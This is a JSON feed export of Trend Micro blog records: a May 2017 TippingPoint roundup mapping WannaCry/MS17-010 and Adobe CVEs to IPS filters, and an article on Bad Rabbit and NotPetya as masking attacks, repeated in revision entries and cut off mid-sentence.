"SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0147", "MS:CVE-2017-0144", "MS:CVE-2017-0146"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "securelist", "idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "fireeye", "idList": ["FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}], "modified": "2017-06-30T14:19:55", "rev": 2}}, "reporter": "Elisa Lippincott (TippingPoint Global Product Marketing)", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "trendmicroblog", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"published": "2017-05-19T12:00:15", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2017-05-19T12:47:34", "rev": 2}, "dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2017-3072", "RH:CVE-2017-3071", "RH:CVE-2017-3068", "RH:CVE-2017-3069", "RH:CVE-2017-3070", "RH:CVE-2017-3074", "RH:CVE-2017-3073"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "archlinux", "idList": ["ASA-201705-9", "ASA-201705-8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811192", "OPENVAS:1361412562310811102", "OPENVAS:1361412562310811106", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310811103", "OPENVAS:1361412562310811104", "OPENVAS:1361412562310811105", "OPENVAS:1361412562310811101", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11008"]}, {"type": "nessus", "idList": ["MACOSX_FLASH_PLAYER_APSB17-15.NASL", "700059.PRM", "GENTOO_GLSA-201705-12.NASL", "REDHAT-RHSA-2017-1219.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700091.PRM", "MS17-010.NASL", "FLASH_PLAYER_APSB17-15.NASL", "SMB_NT_MS17_MAY_4020821.NASL", "SUSE_SU-2017-1238-1.NASL"]}, {"type": "mscve", "idList": ["MS:ADV170006"]}, {"type": "gentoo", "idList": ["GLSA-201705-12"]}, {"type": "redhat", "idList": ["RHSA-2017:1219"]}, {"type": "suse", "idList": ["SUSE-SU-2017:1238-1"]}, {"type": "cve", "idList": ["CVE-2017-3074", "CVE-2017-0145", "CVE-2017-3070", "CVE-2017-3071", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-3069", "CVE-2017-3073", "CVE-2017-0147", "CVE-2017-3072", "CVE-2017-3068", "CVE-2017-0146"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-3070", "UB:CVE-2017-3074", "UB:CVE-2017-3073", "UB:CVE-2017-3072", "UB:CVE-2017-3069", "UB:CVE-2017-3068", "UB:CVE-2017-3071"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0386", "CPAI-2017-0383", "CPAI-2017-0177", "CPAI-2017-0390", "CPAI-2017-0385", "CPAI-2017-0392", "CPAI-2017-0388"]}], "modified": "2017-05-19T12:47:34", "rev": 2}}, "id": "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "objectVersion": "1.5", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of May 15, 2017", "bulletinFamily": "blog", "viewCount": 276, "reporter": "Elisa Lippincott (TippingPoint Global Product Marketing)", "references": [], "enchantments_done": [], "type": "trendmicroblog", "_object_type": "robots.models.rss.RssBulletin", "history": [], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "\n\n\u201cAre you crying? ARE YOU CRYING? There\u2019s no crying! THERE\u2019S NO CRYING IN BASEBALL!\u201d Those famous words from Jimmy Dugan (portrayed by Tom Hanks) in the 1992 movie _A League of their Own_, ring true in the world of baseball. Unfortunately, in the cyber security world, there has been some crying this week with the outbreak of WannaCry, which is being dubbed the biggest global ransomware attack to date. WannaCry is taking advantage of a recently disclosed Microsoft vulnerability ([MS17-010 \u2013 \u201cEternalBlue\u201d](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) associated with the Shadow Brokers tools release, and news outlets are reporting that as many as 300,000 computers in 150 countries have been infected with the malware.\n\nFor customers using TippingPoint solutions, we have identified the following Digital Vaccine\u00ae (DV) filters that should help you protect against the exploits listed in the table below:\n\n**CVE #** | **Digital Vaccine Filter #** | **Category** | **Comments** \n---|---|---|--- \nCVE-2017-0143 | 27433 | Exploit | SMB: Server MID Type Confusion Vulnerability \nCVE-2017-0144 | 27928 | Vulnerabilities | SMB: Remote Code Execution Vulnerability (EternalBlue) \nCVE-2017-0145 | 27711 | Exploit | SMB: Server SMBv1 Buffer Overflow Vulnerability \nCVE-2017-0146 | 27928, 27929 | Vulnerabilities | SMB: Remote Code Execution Vulnerabilities (EternalChampion)\n\n \n\nSMB: Remote Code Execution Vulnerability (EternalBlue) \nCVE-2017-0147 | 27929, 27937 | Vulnerabilities | SMB: Remote Code Execution Vulnerability (EternalBlue)\n\n \n\nSMB: NT_TRANSACT_RENAME Information Disclosure Vulnerability (EternalSynergy) \n| 2176 | Security Policy | SMB: Null Session SetUp \n| 11403 | Security Policy | SMB: Suspicious SMB Fragmentation \n| 27935 | Exploit | SMB: DoublePulsar Backdoor \n| 5614 | Exploit | SMB: Malicious SMB Probe/Attack \n| 30623 | Virus (ThreatDV) | TLS: Suspicious SSL Certificate (DGA) \n \n \n\nIn addition to the DV coverage already provided by TippingPoint, customers who subscribe to our ThreatDV service received additional coverage for the WannaCry/WCRY ransomware vulnerability prior to the usual ThreatDV weekly distribution time. The following filters can be used to prevent the download of the binary files which are known to infect target machines with the ransomware:\n\n| \n\n * 28304: TCP: Ransom_WCRY.I Download Attempt (Specific)\n * 28305: TCP: Ransom_WCRY.I Download Attempt (Generic) \n---|--- \n| \n \nFor further information related to Trend Micro\u2019s response to WannaCry and our recommendations as a whole, please visit <https://success.trendmicro.com/solution/1117391>.\n\nFor information on indicators showing interception or blocking of WannaCry, please visit <https://success.trendmicro.com/solution/1117402-indicators-showing-interception-blocking-of-wcry-wannacry-ransomware>.\n\n**While Everyone was Freaking Out with WannaCry\u2026**\n\nApple had a doozy of a month with their release of [seven updates](<https://support.apple.com/en-us/HT201222>) addressing 66 unique CVEs in macOS, iOS, watchOS, tvOS, iTunes for Windows, Safari, and iCloud for Windows. 35 percent of the CVEs were submitted to Apple via our Zero Day Initiative (ZDI) bug bounty program, with a number of them initially disclosed during our Pwn2Own contest held earlier this year.\n\nFor more information on these vulnerabilities, check out the ZDI blog here: <https://www.zerodayinitiative.com/blog/2017/5/15/the-may-2017-apple-security-update-review>.\n\n**Adobe Security Updates**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Adobe updates released on or before May 16, 2017. The following table maps Digital Vaccine filters to the Adobe updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [May 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/5/5/the-may-2017-security-update-review>):\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter #** \n---|---|--- \nAPSB17-15 | CVE-2017-3068 | 28215 \nAPSB17-15 | CVE-2017-3069 | 28222 \nAPSB17-15 | CVE-2017-3070 | 28224 \nAPSB17-15 | CVE-2017-3071 | 28225 \nAPSB17-15 | CVE-2017-3072 | 28217 \nAPSB17-15 | CVE-2017-3073 | 27830 \nAPSB17-15 | CVE-2017-3074 | 27831 \n \n \n\n**Zero-Day Filters**\n\nThere are 12 new zero-day filters covering six vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (2)_**\n\n| \n\n * 28216: ZDI-CAN-4568: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28218: ZDI-CAN-4562: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)**_ _** \n---|--- \n| \n \n**_Apple (1)_**\n\n| \n\n * 28288: ZDI-CAN-4711: Zero Day Initiative Vulnerability (Apple Safari)**_ _** \n---|--- \n| \n \n**_Dell (1)_**\n\n| \n\n * 28230: ZDI-CAN-4754: Zero Day Initiative Vulnerability (Dell EMC VNX Monitoring and Reporting)**_ _** \n---|--- \n| \n \n**_Hewlett Packard Enterprise (2)_**\n\n| \n\n * 28211: ZDI-CAN-4524,4563: Zero Day Initiative Vulnerability (HPE Operations Orchestration)\n * 28231: ZDI-CAN-4758: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)**_ _** \n---|--- \n| \n \n**_Microsoft (3)_**\n\n| \n\n * 28220: ZDI-CAN-4700: Zero Day Initiative Vulnerability (Microsoft Windows)\n * 28226: ZDI-CAN-4708: Zero Day Initiative Vulnerability (Microsoft Windows)\n * 28227: ZDI-CAN-4713: Zero Day Initiative Vulnerability (Microsoft Windows)**_ _** \n---|--- \n| \n \n**_Trend Micro (3)_**\n\n| \n\n * 28118: HTTPS: Trend Micro SafeSync for Enterprise deviceTool.pm get_nic_device SQL Injection (ZDI-17-125)\n * 28228: ZDI-CAN-4744-4745: Zero Day Initiative Vulnerability (Trend Micro InterScan Messaging Security)\n * 28286: ZDI-CAN-4778: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-8-2017/>).", "cvelist": ["CVE-4744-4745", "CVE-2017-3068", "CVE-2017-3073", "CVE-2017-3069", "CVE-2017-3072", "CVE-2017-0144", "CVE-2017-3071", "CVE-2017-3070", "CVE-2017-0147", "CVE-2017-3074", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-15-2017/", "modified": "2017-05-19T12:00:15", "lastseen": "2017-05-19T12:47:34", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"published": "2017-11-20T16:29:06", "href": "https://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/", "lastseen": "2017-11-26T20:03:00", "objectVersion": "1.5", "history": [{"lastseen": "2017-11-20T18:01:36", "bulletin": {"published": "2017-11-20T16:29:06", "href": "http://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/", "enchantments_done": [], "lastseen": "2017-11-20T18:01:36", "history": [], "type": "trendmicroblog", "bulletinFamily": "blog", "modified": "2017-11-20T16:29:06", "enchantments": {}, "id": "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "reporter": "Trend Micro", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "title": "Double Whammy: When One Attack Masks Another Attack", "objectVersion": "1.4", "cvelist": ["CVE-2017-0145"], "references": [], "description": "\n\nIn some contexts, a double whammy can mean a good thing: when your favorite team wins two games in a row, when two candy bars fall from the vending machine, etc. However, in the context of cyber security, a double whammy may translate to being attacked while still reeling from the impact of another threat.\n\nIn cyber security, many organizations focus on addressing individual weaknesses and exploitable vulnerabilities, thinking this will be enough to stop an attack. While this is sometimes true, today's hackers are much more sophisticated and determined than cyber criminals of the past. If one avenue into a target doesn't work, a hacker will keep trying until they're able to successfully breach the system. \n\nRecently, a new style of hacking has emerged, which leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar - providing a path for additional infections, or to making off with stolen data and other intellectual property. Hackers will typically utilize particularly visible ransomware samples for the initial attack, providing an ideal distraction tool within this style of double whammy breach. This approach is something that will take place increasingly frequently into 2018. \n\nBut what, exactly, does this kind of attack look like? And how can organizations protect themselves when a double whammy cyber security instance of this kind hits their systems? Let's take a closer look at what happens when one attack masks another: \n\n## Bad Rabbit hides spear phishing \n\nA recent example of one attack masking another more damaging hacker activity involves Bad Rabbit. This ransomware sample first emerged in the fall of 2017 when it was used as the launch pad for the [infection of more than 200 organizations in Russia and Ukraine](<https://thehackernews.com/2017/10/bad-rabbit-ransomware.html>), The Hacker News reported. The Bad Rabbit exploit utilized an NSA exploit stolen by the Shadow Brokers hacking group, enabling it to quickly infiltrate and spread across victims' networks. \n\nOther well-known samples have recently leveraged EternalBlue - like the NotPetya ransomware, which we'll discuss a bit later. Bad Rabbit, on the other hand, used the EternalRomance RCE exploit to drive its malicious activity. This vulnerability works by exploiting a Microsoft Windows Server Messaging Block flaw identified as CVE-2017-0145. The vulnerability impacts the transfer of data between Windows endpoints, and enables hackers to bypass security protocols to support remove code execution. \n\nWhen the attacks first emerged, researchers found that the infection began with a drive-by download stemming from infected Russian media sites which utilized a fake Flasher player to install the malware. \n\nFrom the successful infections, though, researchers quickly discovered that Bad Rabbit wasn't just a run-of-the-mill ransomware infection: The sample also [hid a powerful spear phishing campaign](<https://blog.knowbe4.com/bad-rabbit-ransomware-attack-was-hiding-a-spear-phishing-campaign>). \n\n\"[A] number of Ukrainian entities were targeted by phishing campaigns at the same time as Bad Rabbit spread,\" KnowBe4 contributor Stu Sjouwerman wrote. \"Those campaigns intended to compromise financial information and other sensitive data.\" \n\nIn this way, the initial Bad Rabbit ransomware was just a smoke screen for a more targeted attack seeking out valuable company data. Serhiy Demedyuk, head of the Ukrainian state cyber police, called the instances \"hybrid attacks,\" and noted that the first attack garners much of the attention, enabling the second attack to succeed with \"devastating results.\" \n\nDon't be fooled: Bad Rabbit initially appeared to leverage a Windows vulnerability, but it actually masked a powerful spear phishing attack. \n\n## NotPetya aims to destroy\n\nNotPetya also serves as a powerful example of a double whammy style attack. However, whereas Bad Rabbit masked other, malicious spear phishing activity, NotPetya appeared as a ransomware sample that just aimed to destroy, and not steal from victims' systems. \n\nThe first time many heard about this attack was when its predecessor, Petya, emerged in March of 2016, according to CSO Online contributor Josh Fruhlinger. Petya leveraged an infected email to breach victims, and then moved on to encrypting individual files, including .exe files. \n\nThen, [in June 2017, NotPetya emerged](<https://www.csoonline.com/article/3233210/ransomware/petya-ransomware-and-notpetya-malware-what-you-need-to-know-now.html>), and initially appeared like a typical ransomware infection able to spread quickly from victim to victim and network to network. Although NotPetya looked very similar to Petya - including encrypting files and displaying a notification requesting Bitcoin in exchange for returned access - NotPetya quickly set itself apart. \n\nFruhlinger pointed out that while Petya used an infected email, much like many ransomware samples, NotPetya was able to spread all on its own, using several different approaches to spur infection including a forced backdoor that doesn't require human interaction for successful breach. NotPetya is also capable of encrypting more files, to the point that the hard drive is inoperable. \n\nFinally, as Fruhlinger noted, NotPetya isn't actually ransomware. Its process of infection and encryption is used to mask its true intentions: destruction. \n\n\"It looks like ransomware, complete with a screen informing the victim that they can decrypt their files if they send Bitcoin to a specified wallet,\" Fruhlinger explained. \"For Petya, this screen includes an identifying that they're supposed to send along with the ransom; the attackers use this code to figure out which victim just paid up. But on computers infected with NotPetya, this number is just randomly generated and would be of no help in identifying anything. And it turns out that in the process of encrypting the data, NotPetya damages it beyond repair.\" \n\n_\"NotPetya's process of infection and encryption is used to mask its true intentions: destruction. \"_\n\nSurprisingly, NotPetya's aim isn't to steal data and then sell this information for profit or use it for identity theft or other malicious purposes. NotPetya appears to simply want to break victims' systems, whether or not they pay the ransom. \n\n## Guarding against hybrid attacks \n\nAs hacking becomes more complex and sophisticated and attackers continually flex their skills, it's imperative that businesses are able to keep up with and protect against the latest styles of threats. These hybrid, or masked attacks demonstrate the importance of having as much visibility into network activity as possible, ensuring that even if suspicious activity is detected in one area, victims aren't distracted to the point that it allows for a secondary, damaging attack. \n\nPrecautions including end-to-end monitoring is ideal, helping to prevent malicious and suspicious commands from flying under the radar. IT leaders and decision-makers should seek out solutions that can help pinpoint activity associated with a targeted attack, and providing granular visibility across the network. [Trend Micro's Deep Discovery](<http://apac.trendmicro.com/apac/enterprise/security-risk-management/deep-discovery/index.html>) and [Connected Threat Defense](<https://www.trendmicro.com/en_us/business/technologies/connected-threat-defense.html>) can help ensure that your organization has all-encompassing security. \n\nTo find out more about how Deep Discovery and Connected Threat Defense can benefit your company's security posture, contact Trend Micro today.", "viewCount": 14}, "differentElements": ["description", "href"], "edition": 1}, {"lastseen": "2017-11-22T00:01:39", "bulletin": {"published": "2017-11-20T16:29:06", "href": "https://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/", "enchantments_done": [], "lastseen": "2017-11-22T00:01:39", "history": [], "type": "trendmicroblog", "bulletinFamily": "blog", "modified": "2017-11-20T16:29:06", "enchantments": {}, "id": "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "reporter": "Trend Micro", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "title": "Double Whammy: When One Attack Masks Another Attack", "objectVersion": "1.4", "cvelist": ["CVE-2017-0145"], "references": [], "description": "\n\nIn some contexts, a double whammy can mean a good thing: when your favorite team wins two games in a row, when two candy bars fall from the vending machine, etc. However, in the context of cyber security, a double whammy may translate to being attacked while still reeling from the impact of another threat.\n\nIn cyber security, many organizations focus on addressing individual weaknesses and exploitable vulnerabilities, thinking this will be enough to stop an attack. While this is sometimes true, today's hackers are much more sophisticated and determined than cyber criminals of the past. If one avenue into a target doesn't work, a hacker will keep trying until they're able to successfully breach the system. \n\nRecently, a new style of hacking has emerged, which leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar - providing a path for additional infections, or to making off with stolen data and other intellectual property. Hackers will typically utilize particularly visible ransomware samples for the initial attack, providing an ideal distraction tool within this style of double whammy breach. This approach is something that will take place increasingly frequently into 2018. \n\nBut what, exactly, does this kind of attack look like? And how can organizations protect themselves when a double whammy cyber security instance of this kind hits their systems? Let's take a closer look at what happens when one attack masks another: \n\n## Bad Rabbit hides spear phishing \n\nA recent example of one attack masking another more damaging hacker activity involves Bad Rabbit. This ransomware sample first emerged in the fall of 2017 when it was used as the launch pad for the [infection of more than 200 organizations in Russia and Ukraine](<https://thehackernews.com/2017/10/bad-rabbit-ransomware.html>), The Hacker News reported. The Bad Rabbit exploit utilized an NSA exploit stolen by the Shadow Brokers hacking group, enabling it to quickly infiltrate and spread across victims' networks. \n\nOther well-known samples have recently leveraged EternalBlue - like the NotPetya ransomware, which we'll discuss a bit later. Bad Rabbit, on the other hand, used the EternalRomance RCE exploit to drive its malicious activity. This vulnerability works by exploiting a Microsoft Windows Server Messaging Block flaw identified as CVE-2017-0145. The vulnerability impacts the transfer of data between Windows endpoints, and enables hackers to bypass security protocols to support remove code execution. \n\nWhen the attacks first emerged, researchers found that the infection began with a drive-by download stemming from infected Russian media sites which utilized a fake Flasher player to install the malware. \n\nFrom the successful infections, though, researchers quickly discovered that Bad Rabbit wasn't just a run-of-the-mill ransomware infection: The sample also [hid a powerful spear phishing campaign](<https://blog.knowbe4.com/bad-rabbit-ransomware-attack-was-hiding-a-spear-phishing-campaign>). \n\n\"[A] number of Ukrainian entities were targeted by phishing campaigns at the same time as Bad Rabbit spread,\" KnowBe4 contributor Stu Sjouwerman wrote. \"Those campaigns intended to compromise financial information and other sensitive data.\" \n\nIn this way, the initial Bad Rabbit ransomware was just a smoke screen for a more targeted attack seeking out valuable company data. Serhiy Demedyuk, head of the Ukrainian state cyber police, called the instances \"hybrid attacks,\" and noted that the first attack garners much of the attention, enabling the second attack to succeed with \"devastating results.\" \n\nDon't be fooled: Bad Rabbit initially appeared to leverage a Windows vulnerability, but it actually masked a powerful spear phishing attack. \n\n## NotPetya aims to destroy\n\nNotPetya also serves as a powerful example of a double whammy style attack. However, whereas Bad Rabbit masked other, malicious spear phishing activity, NotPetya appeared as a ransomware sample that just aimed to destroy, and not steal from victims' systems. \n\nThe first time many heard about this attack was when its predecessor, Petya, emerged in March of 2016, according to CSO Online contributor Josh Fruhlinger. Petya leveraged an infected email to breach victims, and then moved on to encrypting individual files, including .exe files. \n\nThen, [in June 2017, NotPetya emerged](<https://www.csoonline.com/article/3233210/ransomware/petya-ransomware-and-notpetya-malware-what-you-need-to-know-now.html>), and initially appeared like a typical ransomware infection able to spread quickly from victim to victim and network to network. Although NotPetya looked very similar to Petya - including encrypting files and displaying a notification requesting Bitcoin in exchange for returned access - NotPetya quickly set itself apart. \n\nFruhlinger pointed out that while Petya used an infected email, much like many ransomware samples, NotPetya was able to spread all on its own, using several different approaches to spur infection including a forced backdoor that doesn't require human interaction for successful breach. NotPetya is also capable of encrypting more files, to the point that the hard drive is inoperable. \n\nFinally, as Fruhlinger noted, NotPetya isn't actually ransomware. Its process of infection and encryption is used to mask its true intentions: destruction. \n\n\"It looks like ransomware, complete with a screen informing the victim that they can decrypt their files if they send Bitcoin to a specified wallet,\" Fruhlinger explained. \"For Petya, this screen includes an identifying that they're supposed to send along with the ransom; the attackers use this code to figure out which victim just paid up. But on computers infected with NotPetya, this number is just randomly generated and would be of no help in identifying anything. And it turns out that in the process of encrypting the data, NotPetya damages it beyond repair.\" \n\n_\"NotPetya's process of infection and encryption is used to mask its true intentions: destruction. \"_\n\nSurprisingly, NotPetya's aim isn't to steal data and then sell this information for profit or use it for identity theft or other malicious purposes. NotPetya appears to simply want to break victims' systems, whether or not they pay the ransom. \n\n## Guarding against hybrid attacks \n\nAs hacking becomes more complex and sophisticated and attackers continually flex their skills, it's imperative that businesses are able to keep up with and protect against the latest styles of threats. These hybrid, or masked attacks demonstrate the importance of having as much visibility into network activity as possible, ensuring that even if suspicious activity is detected in one area, victims aren't distracted to the point that it allows for a secondary, damaging attack. \n\nPrecautions including end-to-end monitoring is ideal, helping to prevent malicious and suspicious commands from flying under the radar. IT leaders and decision-makers should seek out solutions that can help pinpoint activity associated with a targeted attack, and providing granular visibility across the network. [Trend Micro's Deep Discovery](<http://apac.trendmicro.com/apac/enterprise/security-risk-management/deep-discovery/index.html>) and [Connected Threat Defense](<https://www.trendmicro.com/en_us/business/technologies/connected-threat-defense.html>) can help ensure that your organization has all-encompassing security. \n\nTo find out more about how Deep Discovery and Connected Threat Defense can benefit your company's security posture, contact Trend Micro today.", "viewCount": 14}, "differentElements": ["description", "href"], "edition": 2}, {"lastseen": "2017-11-22T16:01:53", "bulletin": {"published": "2017-11-20T16:29:06", "href": "http://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/", "enchantments_done": [], "lastseen": "2017-11-22T16:01:53", "history": [], "type": "trendmicroblog", "bulletinFamily": "blog", "modified": "2017-11-20T16:29:06", "enchantments": {}, "id": "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "reporter": "Trend Micro", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "title": "Double Whammy: When One Attack Masks Another Attack", "objectVersion": "1.4", "cvelist": ["CVE-2017-0145"], "references": [], "description": "\n\nIn some contexts, a double whammy can mean a good thing: when your favorite team wins two games in a row, when two candy bars fall from the vending machine, etc. However, in the context of cyber security, a double whammy may translate to being attacked while still reeling from the impact of another threat.\n\nIn cyber security, many organizations focus on addressing individual weaknesses and exploitable vulnerabilities, thinking this will be enough to stop an attack. While this is sometimes true, today's hackers are much more sophisticated and determined than cyber criminals of the past. If one avenue into a target doesn't work, a hacker will keep trying until they're able to successfully breach the system. \n\nRecently, a new style of hacking has emerged, which leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar - providing a path for additional infections, or to making off with stolen data and other intellectual property. Hackers will typically utilize particularly visible ransomware samples for the initial attack, providing an ideal distraction tool within this style of double whammy breach. This approach is something that will take place increasingly frequently into 2018. \n\nBut what, exactly, does this kind of attack look like? And how can organizations protect themselves when a double whammy cyber security instance of this kind hits their systems? Let's take a closer look at what happens when one attack masks another: \n\n## Bad Rabbit hides spear phishing \n\nA recent example of one attack masking another more damaging hacker activity involves Bad Rabbit. This ransomware sample first emerged in the fall of 2017 when it was used as the launch pad for the [infection of more than 200 organizations in Russia and 